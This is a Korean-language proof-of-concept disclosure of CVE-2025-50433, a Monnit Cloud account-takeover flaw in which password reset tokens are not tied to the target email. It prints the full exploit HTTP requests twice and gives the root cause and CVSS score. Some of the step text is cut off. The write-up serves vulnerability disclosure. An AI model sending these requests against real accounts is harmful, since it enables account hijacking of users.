
# CVE-2025-50433 개념 증명: Monnit Cloud 계정 탈취 심각한 Monnit Cloud 계정 탈취(CVE-2025-50433)에 대한 개념 증명으로, 비밀번호 재설정 과정에서 누락된 토큰-이메일 검증을 악용하며 공격 절차, 근본 원인, 그리고 해결 방안을 제공합니다.
*.imonnit.com 전반에 걸쳐 치명적인 인증 취약점이 존재하며, 피해자 상호작용 없이 모든 사용자 계정에 대해 **전체 계정 탈취(ATO)**가 가능합니다.
백엔드가 비밀번호 재설정 토큰과 대상 이메일 간의 연결을 검증하지 못하여, 공격자가 자신의 유효한 재설정 토큰을 사용하여 모든 피해자 계정의 비밀번호를 재설정할 수 있습니다.
[email protected])를 생성합니다.[email protected])를 보유하고 있습니다. POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
CVSS 3.1: 9.8 (치명적)
벡터: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
*.imonnit.com
비밀번호 재설정 엔드포인트가 재설정 작업 중 제공된 이메일과 재설정 토큰이 동일한 계정에 속하는지 검증하지 않아, 공격자가 자신이 제어하는 토큰을 사용하여 임의의 비밀번호 재설정이 가능합니다.
/Account/PasswordReset/
공급업체: Monnit Corporation
Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor